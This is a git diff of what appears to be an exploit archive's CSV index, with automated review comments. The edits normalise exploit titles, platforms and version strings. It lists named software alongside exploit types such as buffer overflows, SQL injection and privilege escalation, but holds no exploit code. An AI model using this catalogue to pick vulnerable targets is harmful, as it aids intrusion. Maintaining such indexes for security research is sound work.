diff --git a/files.csv b/files.csv
index 6db9bd45d..834f67c62 100755
--- a/files.csv
+++ b/files.csv
@@ -354,7 +354,7 @@ id,file,description,date,author,platform,type,port
 378,platforms/windows/remote/378.pl,"BlackJumboDog Remote Buffer Overflow Exploit",2004-08-05,"Tal Zeltzer",windows,remote,21
 379,platforms/linux/remote/379.txt,"CVSTrac Remote Arbitrary Code Execution Exploit",2004-08-06,N/A,linux,remote,0
 380,platforms/linux/remote/380.c,"Pavuk Digest Authentication Buffer Overflow Remote Exploit",2004-08-08,infamous41md,linux,remote,80
-381,platforms/windows/local/381.c,"Serv-U 3x - 5.x - Local Privilege Escalation Exploit",2004-08-08,"Andrés Acunha",windows,local,0
+381,platforms/windows/local/381.c,"Serv-U 3.x - 5.x - Local Privilege Escalation Exploit",2004-08-08,"Andrés Acunha",windows,local,0
 382,platforms/linux/remote/382.c,"Melange Chat Server 1.10 - Remote Buffer Overflow Exploit",2002-12-24,innerphobia,linux,remote,0
 383,platforms/multiple/dos/383.c,"psyBNC <= 2.3 - Denial of Service Exploit",2002-05-19,"Lunar Fault",multiple,dos,31337
 384,platforms/php/webapps/384.txt,"PHP (php-exec-dir) Patch Command Access Restriction Bypass",2004-08-08,VeNoMouS,php,webapps,0
@@ -652,7 +652,7 @@ id,file,description,date,author,platform,type,port
 827,platforms/windows/remote/827.c,"3Com 3CDaemon FTP Unauthorized _USER_ Remote BoF Exploit",2005-02-18,class101,windows,remote,21
 828,platforms/multiple/remote/828.c,"Knox Arkeia Server Backup 5.3.x - Remote Root Exploit",2005-02-18,"John Doe",multiple,remote,617
 829,platforms/hardware/remote/829.c,"Thomson TCW690 POST Password Validation Exploit",2005-02-19,MurDoK,hardware,remote,80
-830,platforms/windows/remote/830.c,"SHOUTcast 1.9.4 File Request Format String Remote Exploit (win)",2005-02-19,mandragore,windows,remote,8000
+830,platforms/windows/remote/830.c,"SHOUTcast 1.9.4 - File Request Format String Remote Exploit (Windows)",2005-02-19,mandragore,windows,remote,8000
 831,platforms/linux/remote/831.c,"GNU Cfengine 2.17p1 RSA Authentication Heap Overflow Exploit",2005-02-20,jsk,linux,remote,5803
 832,platforms/php/webapps/832.txt,"vBulletin <= 3.0.6 php Code Injection",2005-02-22,pokley,php,webapps,0
 833,platforms/windows/local/833.cpp,"PeerFTP 5 - Local Password Disclosure Exploit",2005-02-22,Kozan,windows,local,0
@@ -3064,6 +3064,7 @@ id,file,description,date,author,platform,type,port
 3395,platforms/windows/remote/3395.c,"WebMod 0.48 (Content-Length) Remote Buffer Overflow Exploit PoC",2007-03-01,cybermind,windows,remote,0
 3396,platforms/linux/dos/3396.php,"PHP <= 4.4.4 unserialize() ZVAL Reference Counter Overflow Exploit PoC",2007-03-02,"Stefan Esser",linux,dos,0
 3397,platforms/windows/remote/3397.pl,"MailEnable Pro/Ent <= 2.37 (APPEND) Remote Buffer Overflow Exploit",2007-03-02,mu-b,windows,remote,143
+39567,platforms/php/webapps/39567.txt,"Monstra CMS 3.0.3 - Multiple Vulnerabilities",2016-03-16,"Sarim Kiani",php,webapps,80
 3398,platforms/php/webapps/3398.txt,"Mani Stats Reader <= 1.2 (ipath) Remote File Include Vulnerability",2007-03-02,mozi,php,webapps,0
 3399,platforms/windows/dos/3399.txt,"Netrek 2.12.0 - pmessage2() Remote Limited Format String Exploit",2007-03-02,"Luigi Auriemma",windows,dos,0
 3400,platforms/php/webapps/3400.pl,"webSPELL <= 4.01.02 - Multiple Remote SQL Injection Exploit",2007-03-02,DNX,php,webapps,0
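Review bot: The added row for id 39567 is inserted between ids 3397 and 3398, while every other row in this hunk is in ascending id order; if the file is meant to be id-sorted it belongs with the other 39xxx entries, and if it is append-only it belongs at the tail of the file. Placing a 2016 entry in the 2007 region also makes future merge conflicts in this stretch of the file likelier for anyone else editing it. Worth confirming the intended position before merging.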
@@ -3183,8 +3184,8 @@ id,file,description,date,author,platform,type,port
 3518,platforms/php/webapps/3518.pl,"PHP-Nuke Module splattforum 4.0 RC1 - Local File Inclusion Exploit",2007-03-19,GoLd_M,php,webapps,0
 3519,platforms/php/webapps/3519.txt,"phpBB Minerva Mod <= 2.0.21 build 238a SQL Injection Vulnerability",2007-03-19,"Mehmet Ince",php,webapps,0
 3520,platforms/asp/webapps/3520.txt,"NetVios Portal (page.asp) Remote SQL Injection Vulnerability",2007-03-19,parad0x,asp,webapps,0
-3521,platforms/php/webapps/3521.pl,"pragmaMX Module Landkarten 2.1 - Local File Inclusion Exploit (win)",2007-03-19,bd0rk,php,webapps,0
-3522,platforms/php/webapps/3522.pl,"GeBlog 0.1 - GLOBALS[tplname] Local File Inclusion Exploit (win)",2007-03-20,GoLd_M,php,webapps,0
+3521,platforms/php/webapps/3521.pl,"pragmaMX Module Landkarten 2.1 - Local File Inclusion Exploit (Windows)",2007-03-19,bd0rk,php,webapps,0
+3522,platforms/php/webapps/3522.pl,"GeBlog 0.1 - GLOBALS[tplname] Local File Inclusion Exploit (Windows)",2007-03-20,GoLd_M,php,webapps,0
 3524,platforms/php/webapps/3524.txt,"PHP-Nuke Module htmltonuke 2.0alpha (htmltonuke.php) RFI Vuln",2007-03-20,"Cold Zero",php,webapps,0
 3525,platforms/linux/local/3525.php,"PHP <= 4.4.6 / 5.2.1 ext/gd Already Freed Resources Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0
 3526,platforms/hardware/dos/3526.pl,"Cisco Phone 7940/7960 (SIP INVITE) Remote Denial of Service Exploit",2007-03-20,MADYNES,hardware,dos,0
@@ -5313,7 +5314,7 @@ id,file,description,date,author,platform,type,port
 5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader <= 8.1.2 - Malformed PDF Remote DoS PoC",2008-05-29,securfrog,windows,dos,0
 5688,platforms/php/webapps/5688.php,"SyntaxCMS <= 1.3 - (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0
 5689,platforms/php/webapps/5689.txt,"AirvaeCommerce 3.0 (pid) Remote SQL Injection Vulnerability",2008-05-29,QTRinux,php,webapps,0
-5690,platforms/php/webapps/5690.txt,"PicoFlat CMS 0.5.9 - Local File Inclusion Vulnerabilitty (win)",2008-05-29,gmda,php,webapps,0
+5690,platforms/php/webapps/5690.txt,"PicoFlat CMS 0.5.9 - Local File Inclusion Vulnerabilitty (Windows)",2008-05-29,gmda,php,webapps,0
 5691,platforms/php/webapps/5691.php,"CMS from Scratch <= 1.1.3 - (fckeditor) Remote Shell Upload Exploit",2008-05-29,EgiX,php,webapps,0
 5692,platforms/php/webapps/5692.pl,"Mambo Component mambads <= 1.0 RC1 Beta SQL Injection Vulnerability",2008-05-29,Houssamix,php,webapps,0
 5693,platforms/php/webapps/5693.txt,"CMS from Scratch <= 1.1.3 (image.php) Directory Traversal Vulnerability",2008-05-29,Stack,php,webapps,0
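Review bot: The rewritten description for id 5690 still carries the misspelling `Vulnerabilitty` even though the commit already edits that field. Since the row is being touched anyway, the + line should read `"PicoFlat CMS 0.5.9 - Local File Inclusion Vulnerability (Windows)"`; leaving the typo in means a second pass over the same row later.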
@@ -6451,7 +6452,7 @@ id,file,description,date,author,platform,type,port
 6885,platforms/php/webapps/6885.txt,"e107 Plugin lyrics_menu (lyrics_song.php l_id) SQL Injection Vulnerability",2008-10-31,ZoRLu,php,webapps,0
 6886,platforms/php/webapps/6886.txt,"Tribiq CMS 5.0.9a (beta) Insecure Cookie Handling Vulnerability",2008-10-31,ZoRLu,php,webapps,0
 6887,platforms/php/webapps/6887.txt,"Cybershade CMS 0.2b Remote File Inclusion Vulnerability",2008-10-31,w0cker,php,webapps,0
-6888,platforms/php/webapps/6888.txt,"Tribiq CMS 5.0.10a - Local File Inclusion Vulnerability (win)",2008-10-31,GoLd_M,php,webapps,0
+6888,platforms/php/webapps/6888.txt,"Tribiq CMS 5.0.10a - Local File Inclusion Vulnerability (Windows)",2008-10-31,GoLd_M,php,webapps,0
 6889,platforms/php/webapps/6889.txt,"Absolute Content Rotator 6.0 Insecure Cookie Handling Vulnerability",2008-10-31,Hakxer,php,webapps,0
 6890,platforms/php/webapps/6890.txt,"Absolute Banner Manager Insecure Cookie Handling Vulnerability",2008-10-31,Hakxer,php,webapps,0
 6891,platforms/php/webapps/6891.txt,"Absolute Form Processor 4.0 Insecure Cookie Handling Vulnerability",2008-10-31,Hakxer,php,webapps,0
@@ -6810,7 +6811,7 @@ id,file,description,date,author,platform,type,port
 7261,platforms/php/webapps/7261.txt,"Basic PHP CMS (index.php id) Blind SQL Injection Vulnerability",2008-11-28,"CWH Underground",php,webapps,0
 7262,platforms/windows/dos/7262.pl,"Microsoft Office Communicator (SIP) Remote Denial of Service Exploit",2008-11-28,"Praveen Darshanam",windows,dos,0
 7263,platforms/php/webapps/7263.txt,"Booking Centre 2.01 (Auth Bypass) SQL Injection Vulnerability",2008-11-28,MrDoug,php,webapps,0
-7264,platforms/windows/local/7264.txt,"Apache Tomcat - runtime.getRuntime().exec() Privilege Escalation (win)",2008-11-28,Abysssec,windows,local,0
+7264,platforms/windows/local/7264.txt,"Apache Tomcat - runtime.getRuntime().exec() Privilege Escalation (Windows)",2008-11-28,Abysssec,windows,local,0
 7265,platforms/php/webapps/7265.txt,"web calendar system <= 3.40 (xss/SQL) Multiple Vulnerabilities",2008-11-28,Bl@ckbe@rD,php,webapps,0
 7266,platforms/php/webapps/7266.pl,"All Club CMS <= 0.0.2 - Remote DB Config Retrieve Exploit",2008-11-28,StAkeR,php,webapps,0
 7267,platforms/php/webapps/7267.txt,"SailPlanner 0.3a (Auth Bypass) SQL Injection Vulnerability",2008-11-28,JIKO,php,webapps,0
@@ -7470,7 +7471,7 @@ id,file,description,date,author,platform,type,port
 7935,platforms/windows/remote/7935.html,"Google Chrome 1.0.154.46 (ChromeHTML://) Parameter Injection PoC",2009-01-30,waraxe,windows,remote,0
 7936,platforms/php/webapps/7936.txt,"sma-db 0.3.12 (rfi/XSS) Multiple Vulnerabilities",2009-02-02,ahmadbady,php,webapps,0
 7938,platforms/php/webapps/7938.txt,"Flatnux 2009-01-27 (Job fields) XSS/Iframe Injection PoC",2009-02-02,"Alfons Luja",php,webapps,0
-7939,platforms/php/webapps/7939.txt,"AJA Portal 1.2 - Local File Inclusion Vulnerabilities (win)",2009-02-02,ahmadbady,php,webapps,0
+7939,platforms/php/webapps/7939.txt,"AJA Portal 1.2 - Local File Inclusion Vulnerabilities (Windows)",2009-02-02,ahmadbady,php,webapps,0
 7940,platforms/php/webapps/7940.txt,"WholeHogSoftware Ware Support (Auth Bypass) SQL Injection Vuln",2009-02-02,ByALBAYX,php,webapps,0
 7941,platforms/php/webapps/7941.txt,"WholeHogSoftware Password Protect (Auth Bypass) SQL Injection Vuln",2009-02-02,ByALBAYX,php,webapps,0
 7942,platforms/windows/dos/7942.pl,"Elecard AVC HD PLAYER (m3u/xpl file) Local Stack Overflow PoC",2009-02-02,AlpHaNiX,windows,dos,0
@@ -7607,7 +7608,7 @@ id,file,description,date,author,platform,type,port
 8077,platforms/windows/dos/8077.html,"Microsoft Internet Explorer 7 - Memory Corruption PoC (MS09-002)",2009-02-18,N/A,windows,dos,0
 8079,platforms/windows/remote/8079.html,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (XP SP2)",2009-02-20,Abysssec,windows,remote,0
 8080,platforms/windows/remote/8080.py,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (py)",2009-02-20,"David Kennedy (ReL1K)",windows,remote,0
-8082,platforms/windows/remote/8082.html,"Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption PoC (MS09-002)",2009-02-20,webDEViL,windows,remote,0
+8082,platforms/windows/remote/8082.html,"Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption PoC (MS09-002)",2009-02-20,webDEViL,windows,remote,0
 8083,platforms/php/webapps/8083.txt,"phpBB 3 (autopost bot mod <= 0.1.3) Remote File Include Vulnerability",2009-02-20,Kacper,php,webapps,0
 8084,platforms/windows/dos/8084.pl,"Got All Media 7.0.0.3 - (t00t) Remote Denial of Service Exploit",2009-02-20,LiquidWorm,windows,dos,0
 8085,platforms/cgi/webapps/8085.txt,"i-dreams Mailer 1.2 Final - (admin.dat) File Disclosure Vulnerability",2009-02-20,Pouya_Server,cgi,webapps,0
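Review bot: The removed and added lines for id 8082 are identical as displayed, so whatever changed must be invisible here (trailing whitespace, a non-breaking space, or an encoding difference); the same holds for 15016, 15943, 16362 and 17207 in the hunks at -13092, -13824, -14165 and -14976. A reviewer cannot confirm these edits from the rendered diff, so the commit message should state which character was changed, or the lines should be checked with a whitespace-visible diff before merging. If they turn out to be an accidental re-encoding, those hunks should be dropped from the commit.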
@@ -7848,7 +7849,7 @@ id,file,description,date,author,platform,type,port
 8335,platforms/windows/dos/8335.c,"DeepBurner 1.9.0.228 - Stack Buffer Overflow (SEH) PoC",2009-04-01,"fl0 fl0w",windows,dos,0
 8336,platforms/windows/remote/8336.pl,"Oracle WebLogic IIS connector JSESSIONID Remote Overflow Exploit",2009-04-01,"Guido Landi",windows,remote,0
 8337,platforms/multiple/dos/8337.c,"XBMC 8.10 (GET Requests) Multiple Remote Buffer Overflow PoC",2009-04-01,n00b,multiple,dos,0
-8338,platforms/windows/remote/8338.py,"XBMC 8.10 (Get Request) Remote Buffer Overflow Exploit (win)",2009-04-01,n00b,windows,remote,80
+8338,platforms/windows/remote/8338.py,"XBMC 8.10 - (GET Request) Remote Buffer Overflow Exploit (Windows)",2009-04-01,n00b,windows,remote,80
 8339,platforms/windows/remote/8339.py,"XBMC 8.10 (takescreenshot) Remote Buffer Overflow Exploit",2009-04-01,n00b,windows,remote,80
 8340,platforms/windows/remote/8340.py,"XBMC 8.10 (get tag from file name) Remote Buffer Overflow Exploit",2009-04-01,n00b,windows,remote,80
 8341,platforms/php/webapps/8341.txt,"MyioSoft Ajax Portal 3.0 (page) SQL Injection Vulnerability",2009-04-01,cOndemned,php,webapps,0
@@ -7935,7 +7936,7 @@ id,file,description,date,author,platform,type,port
 8425,platforms/php/webapps/8425.txt,"php-revista 1.1.2 (rfi/sqli/cb/XSS) Multiple Vulnerabilities",2009-04-14,SirDarckCat,php,webapps,0
 8426,platforms/windows/local/8426.pl,"Shadow Stream Recorder - (.m3u) Universal Stack Overflow Exploit",2009-04-14,AlpHaNiX,windows,local,0
 8427,platforms/windows/local/8427.py,"Easy RM to MP3 Converter Universal Stack Overflow Exploit",2009-04-14,Stack,windows,local,0
-8428,platforms/windows/remote/8428.txt,"MonGoose 2.4 Webserver Directory Traversal Vulnerability (win)",2009-04-14,e.wiZz!,windows,remote,0
+8428,platforms/windows/remote/8428.txt,"MonGoose 2.4 - Webserver Directory Traversal Vulnerability (Windows)",2009-04-14,e.wiZz!,windows,remote,0
 8429,platforms/multiple/dos/8429.pl,"Steamcast 0.9.75b Remote Denial of Service Exploit",2009-04-14,ksa04,multiple,dos,0
 8430,platforms/openbsd/dos/8430.py,"OpenBSD <= 4.5 IP datagram Null Pointer Deref DoS Exploit",2009-04-14,nonroot,openbsd,dos,0
 8431,platforms/php/webapps/8431.txt,"GuestCal 2.1 (index.php lang) Local File Inclusion Vulnerability",2009-04-14,SirGod,php,webapps,0
@@ -8427,7 +8428,7 @@ id,file,description,date,author,platform,type,port
 8931,platforms/php/webapps/8931.txt,"TorrentVolve 1.4 (deleteTorrent) Delete Arbitrary File Vulnerability",2009-06-11,Br0ly,php,webapps,0
 8932,platforms/php/webapps/8932.txt,"yogurt 0.3 (xss/SQL Injection) Multiple Vulnerabilities",2009-06-11,Br0ly,php,webapps,0
 8933,platforms/php/webapps/8933.php,"Sniggabo CMS (article.php id) Remote SQL Injection Exploit",2009-06-11,Lidloses_Auge,php,webapps,0
-8934,platforms/windows/remote/8934.py,"Apple iTunes 8.1.1.10 - (itms/itcp) Remote Buffer Overflow Exploit (win)",2009-06-12,ryujin,windows,remote,0
+8934,platforms/windows/remote/8934.py,"Apple iTunes 8.1.1.10 - (itms/itcp) Remote Buffer Overflow Exploit (Windows)",2009-06-12,ryujin,windows,remote,0
 8935,platforms/php/webapps/8935.txt,"Zip Store Chat 4.0/5.0 (Auth Bypass) SQL Injection Vulnerability",2009-06-12,ByALBAYX,php,webapps,0
 8936,platforms/php/webapps/8936.txt,"4images <= 1.7.7 Filter Bypass HTML Injection/XSS Vulnerability",2009-06-12,Qabandi,php,webapps,0
 8937,platforms/php/webapps/8937.txt,"campus virtual-lms (xss/SQL Injection) Multiple Vulnerabilities",2009-06-12,Yasión,php,webapps,0
@@ -8679,14 +8680,14 @@ id,file,description,date,author,platform,type,port
 9195,platforms/php/webapps/9195.txt,"radlance gold 7.5 - Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps,0
 9196,platforms/php/webapps/9196.txt,"radnics gold 5.0 - Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps,0
 9198,platforms/multiple/dos/9198.txt,"Real Helix DNA RTSP and SETUP Request Handler Vulnerabilities",2009-07-17,"Core Security",multiple,dos,0
-9199,platforms/windows/local/9199.txt,"Adobe Related Service - (getPlus_HelperSvc.exe) Local Privilege Escalation",2009-07-20,Nine:Situations:Group,windows,local,0
+9199,platforms/windows/local/9199.txt,"Adobe 9.x Related Service - (getPlus_HelperSvc.exe) Local Privilege Escalation",2009-07-20,Nine:Situations:Group,windows,local,0
 9200,platforms/windows/dos/9200.pl,"EpicVJ 1.2.8.0 - (.mpl/.m3u) Local Heap Overflow PoC",2009-07-20,hack4love,windows,dos,0
 9202,platforms/php/webapps/9202.txt,"Silentum Guestbook 2.0.2 (silentum_guestbook.php) SQL Injection Vuln",2009-07-20,Bgh7,php,webapps,0
 9203,platforms/php/webapps/9203.txt,"Netrix CMS 1.0 - Authentication Bypass Vulnerability",2009-07-20,Mr.tro0oqy,php,webapps,0
 9204,platforms/php/webapps/9204.txt,"MiniCWB 2.3.0 (LANG) Remote File Inclusion Vulnerabilities",2009-07-20,NoGe,php,webapps,0
 9205,platforms/php/webapps/9205.txt,"mcshoutbox 1.1 (sql/xss/shell) Multiple Vulnerabilities",2009-07-20,SirGod,php,webapps,0
 9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 (pecoff executable) Local Denial of Service Exploit",2009-07-20,"Shaun Colley",freebsd,dos,0
-9207,platforms/windows/local/9207.sh,"PulseAudio setuid - Local Privilege Escalation Exploit",2009-07-20,N/A,windows,local,0
+9207,platforms/linux/local/9207.sh,"PulseAudio setuid - Local Privilege Escalation Exploit",2009-07-20,N/A,linux,local,0
 9208,platforms/linux/local/9208.txt,"PulseAudio setuid - Local Privilege Escalation Vulnerability (Ubuntu 9.04 & Slackware 12.2.0)",2009-07-20,N/A,linux,local,0
 9209,platforms/hardware/remote/9209.txt,"DD-WRT (httpd service) Remote Command Execution Vulnerability",2009-07-20,gat3way,hardware,remote,0
 9211,platforms/php/webapps/9211.txt,"Alibaba-clone CMS (SQL/bSQL) Remote SQL Injection Vulnerabilities",2009-07-20,"599eme Man",php,webapps,0
@@ -8700,7 +8701,7 @@ id,file,description,date,author,platform,type,port
 9220,platforms/windows/dos/9220.pl,"KMplayer <= 2.9.4.1433 - (.srt) Local Buffer Overflow PoC",2009-07-20,b3hz4d,windows,dos,0
 9221,platforms/windows/local/9221.pl,"WINMOD 1.4 - (.lst) Local Buffer Overflow Exploit (SEH)",2009-07-21,hack4love,windows,local,0
 9222,platforms/windows/dos/9222.cpp,"FlyHelp - (.CHM) Local Buffer Overflow PoC",2009-07-21,"fl0 fl0w",windows,dos,0
-9223,platforms/windows/local/9223.txt,"Adobe Acrobat 9.1.2 - NOS Local Privilege Escalation Exploit",2009-07-21,"Jeremy Brown",windows,local,0
+9223,platforms/windows/local/9223.txt,"Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation Exploit (C)",2009-07-21,"Jeremy Brown",windows,local,0
 9224,platforms/windows/remote/9224.py,"Microsoft Office Web Components Spreadsheet ActiveX (OWC10/11) Exploit",2009-07-21,"Ahmed Obied",windows,remote,0
 9225,platforms/php/webapps/9225.txt,"AnotherPHPBook (APB) 1.3.0 (Auth Bypass) - SQL Injection Vulnerability",2009-07-21,n3w7u,php,webapps,0
 9226,platforms/php/webapps/9226.txt,"phpdirectorysource (xss/SQL) Multiple Vulnerabilities",2009-07-21,Moudi,php,webapps,0
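Review bot: The row for id 9207 now points at `platforms/linux/local/9207.sh`, but this diff touches only files.csv, so unless the script is moved in the same commit (not visible here) the index will reference a path that does not exist while the old `platforms/windows/local/9207.sh` becomes orphaned. Please confirm the matching `git mv` is part of this change, and that the platform column switch to `linux` agrees with the script's own header rather than being inferred from the neighbouring 9208 row. The hunk at -8679 begins on the previous line.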
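Review bot: The new description for id 9223 tags the entry as `(C)` while the file column still points at `9223.txt`, whereas the parallel row 9272 uses `(Python)` with a matching `.py` extension. If the .txt really contains C source the tag is defensible, otherwise it misleads anyone filtering the index by language; either verify against the file content or drop the suffix so the two rows stay consistent.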
@@ -8746,7 +8747,7 @@ id,file,description,date,author,platform,type,port
 9269,platforms/php/webapps/9269.txt,"PHP Paid 4 Mail Script (home.php page) Remote File Inclusion Vuln",2009-07-27,int_main();,php,webapps,0
 9270,platforms/php/webapps/9270.txt,"Super Mod System 3.0 - (s) SQL Injection Vulnerability",2009-07-27,MizoZ,php,webapps,0
 9271,platforms/php/webapps/9271.txt,"Inout Adserver (id) Remote SQL Injection Vulnerability",2009-07-27,boom3rang,php,webapps,0
-9272,platforms/windows/local/9272.py,"Adobe Acrobat 9.1.2 - NOS Local Privilege Escalation Exploit (py)",2009-07-27,Dr_IDE,windows,local,0
+9272,platforms/windows/local/9272.py,"Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation Exploit (Python)",2009-07-27,Dr_IDE,windows,local,0
 9273,platforms/php/webapps/9273.php,"Allomani Mobile 2.5 - Remote Blind SQL Injection Exploit",2009-07-27,Qabandi,php,webapps,0
 9274,platforms/php/webapps/9274.php,"Allomani Songs & Clips 2.7.0 - Blind SQL Injection Exploit",2009-07-27,Qabandi,php,webapps,0
 9275,platforms/php/webapps/9275.php,"Allomani Movies & Clips 2.7.0 - Remote Blind SQL Injection Exploit",2009-07-27,Qabandi,php,webapps,0
@@ -9192,7 +9193,7 @@ id,file,description,date,author,platform,type,port
 9732,platforms/multiple/webapps/9732.txt,"Joomla component com_jinc 0.2 - (newsid) Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0
 9733,platforms/multiple/webapps/9733.pl,"Joomla component com_mytube (user_id) 1.0 Beta - Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0
 9734,platforms/windows/dos/9734.py,"BigAnt Server <= 2.50 SP6 - Local (ZIP File) Buffer Overflow PoC (2)",2009-09-21,Dr_IDE,windows,dos,0
-9800,platforms/windows/remote/9800.cpp,"Serv-u Web client 9.0.0.5 - Buffer Overflow",2009-11-05,"Megumi Yanagishita",windows,remote,80
+9800,platforms/windows/remote/9800.cpp,"Serv-U Web Client 9.0.0.5 - Buffer Overflow (2)",2009-11-05,"Megumi Yanagishita",windows,remote,80
 9801,platforms/php/webapps/9801.txt,"FlatPress 0.804 - 0.812.1 - Local File Inclusion Vulnerability",2009-09-29,"Giuseppe Fuggiano",php,webapps,0
 9802,platforms/windows/remote/9802.html,"IBM Installation Manager <= 1.3.0 iim:// URI handler Exploit",2009-09-29,bruiser,windows,remote,0
 9803,platforms/windows/remote/9803.html,"EMC Captiva QuickScan Pro 4.6 SP1 and EMC Documentum ApllicationXtender Desktop 5.4 (keyhelp.ocx 1.2.312) - Remote Exploit",2009-09-29,pyrokinesis,windows,remote,0
@@ -9343,7 +9344,7 @@ id,file,description,date,author,platform,type,port
 9963,platforms/asp/webapps/9963.txt,"QuickTeam 2.2 - SQL Injection",2009-10-14,"drunken danish rednecks",asp,webapps,0
 9964,platforms/php/webapps/9964.txt,"RunCMS 2m1 store() SQL injection",2009-10-26,bookoo,php,webapps,0
 9965,platforms/php/webapps/9965.txt,"RunCMS 2ma post.php SQL injection",2009-10-26,bookoo,php,webapps,0
-9966,platforms/windows/remote/9966.txt,"Serv-u Web client 9.0.0.5 - Buffer Overflow",2009-11-02,"Nikolas Rangos",windows,remote,80
+9966,platforms/windows/remote/9966.txt,"Serv-U Web Client 9.0.0.5 - Buffer Overflow (1)",2009-11-02,"Nikolas Rangos",windows,remote,80
 9967,platforms/asp/webapps/9967.txt,"SharePoint 2007 Team Services source code disclosure",2009-10-26,"Daniel Martin",asp,webapps,0
 9969,platforms/multiple/dos/9969.txt,"Snort <= 2.8.5 - IPv6 DoS",2009-10-23,"laurent gaffie",multiple,dos,0
 9970,platforms/windows/local/9970.txt,"South River Technologies WebDrive 9.02 build 2232 - Privilege Escalation",2009-10-20,"bellick ",windows,local,0
@@ -10373,7 +10374,7 @@ id,file,description,date,author,platform,type,port
 11314,platforms/windows/local/11314.py,"CoreFTP 2.1 b1637 - (password field) Universal BoF Exploit",2010-02-02,mr_me,windows,local,0
 11315,platforms/windows/local/11315.c,"Deepburner pro 1.9.0.228 dbr file Buffer Overflow Exploit (Universal)",2010-02-02,"fl0 fl0w",windows,local,0
 11316,platforms/php/webapps/11316.txt,"GCP 2.0 datasets provided as BioCASE Web services",2010-02-02,R3VAN_BASTARD,php,webapps,0
-11317,platforms/windows/local/11317.c,"Qihoo 360 Security Guard breg device drivers Privilege Escalation Vulnerability",2010-02-02,anonymous,windows,local,0
+11317,platforms/windows/local/11317.c,"Qihoo 360 Security Guard 6.1.5.1009 - breg device drivers Privilege Escalation Vulnerability",2010-02-02,anonymous,windows,local,0
 11318,platforms/php/webapps/11318.txt,"Dlili Script SQL Injection Vulnerability",2010-02-02,Dr.DaShEr,php,webapps,0
 11319,platforms/php/webapps/11319.txt,"MYRE Classified (cat) SQL Injection Vulnerability",2010-02-02,kaMtiEz,php,webapps,0
 11320,platforms/windows/dos/11320.pl,"Digital Amp MP3 3.1 - (.Mp3) Local Crash PoC",2010-02-02,SkuLL-HackeR,windows,dos,0
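Review bot: The description for id 11317 gains the version string `6.1.5.1009` that the old line did not carry, and the same kind of newly added version data appears for 9199 (`9.x`, hunk -8679) and 13958 (`< 5.25`, hunk -12298). Nothing in this diff shows where those values come from, so they should be cross-checked against the exploit files' own headers before merging; a wrong affected-version range in the index is harder to notice later than a missing one.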
@@ -12298,7 +12299,7 @@ id,file,description,date,author,platform,type,port
 13955,platforms/php/webapps/13955.txt,"Joomla Template BizWeb com_community Persistent XSS Vulnerability",2010-06-21,Sid3^effects,php,webapps,0
 13956,platforms/php/webapps/13956.txt,"Joomla Hot Property com_jomestate RFI Vulnerability",2010-06-21,Sid3^effects,php,webapps,0
 13957,platforms/php/webapps/13957.txt,"myUPB <= 2.2.6 - Multiple Vulnerabilities",2010-06-21,"ALTBTA ",php,webapps,0
-13958,platforms/windows/dos/13958.txt,"Sysax Multi Server (SFTP module) Multiple Commands DoS Vulnerabilities",2010-06-21,leinakesi,windows,dos,0
+13958,platforms/windows/dos/13958.txt,"Sysax Multi Server < 5.25 - (SFTP Module) Multiple Commands DoS Vulnerabilities",2010-06-21,leinakesi,windows,dos,0
 13959,platforms/windows/dos/13959.c,"teamspeak <= 3.0.0-beta25 - Multiple Vulnerabilities",2010-06-21,"Luigi Auriemma",windows,dos,9987
 14363,platforms/php/webapps/14363.txt,"Ad Network Script Persistent XSS Vulnerability",2010-07-14,Sid3^effects,php,webapps,0
 14359,platforms/php/webapps/14359.html,"Zenphoto CMS 1.3 - Multiple CSRF Vulnerabilities",2010-07-14,10n1z3d,php,webapps,0
@@ -13092,7 +13093,7 @@ id,file,description,date,author,platform,type,port
 15011,platforms/php/webapps/15011.txt,"php microcms 1.0.1 - Multiple Vulnerabilities",2010-09-15,Abysssec,php,webapps,0
 15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH Exploit",2010-09-15,"sanjeev gupta",windows,local,0
 15014,platforms/php/webapps/15014.txt,"pixelpost 1.7.3 - Multiple Vulnerabilities",2010-09-15,Sweet,php,webapps,0
-15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 - Windows 7 ROP-Code (Metasploit)",2010-09-15,Node,windows,remote,0
+15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 - Windows 7 ROP-Code (Metasploit)",2010-09-15,Node,windows,remote,0
 36828,platforms/java/webapps/36828.txt,"JaWiki 'versionNo' Parameter Cross Site Scripting Vulnerability",2012-02-17,sonyy,java,webapps,0
 15017,platforms/windows/dos/15017.py,"Chalk Creek Media Player 1.0.7 - (.mp3 / .wma) Denial of Service Vulnerability",2010-09-16,"Carlos Mario Penagos Hollmann",windows,dos,0
 15018,platforms/asp/webapps/15018.txt,"mojoportal - Multiple Vulnerabilities",2010-09-16,Abysssec,asp,webapps,0
@@ -13824,7 +13825,7 @@ id,file,description,date,author,platform,type,port
 15940,platforms/windows/dos/15940.pl,"HP Data Protector Manager 6.11 - Remote DoS in RDS Service",2011-01-08,Pepelux,windows,dos,0
 15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow Exploit (SEH)",2011-01-08,fdiskyou,windows,local,0
 15942,platforms/php/webapps/15942.txt,"sahana agasti <= 0.6.5 - Multiple Vulnerabilities",2011-01-08,dun,php,webapps,0
-15943,platforms/php/webapps/15943.txt,"WordPress Plugin mingle forum <= 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0
+15943,platforms/php/webapps/15943.txt,"WordPress Plugin mingle forum <= 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0
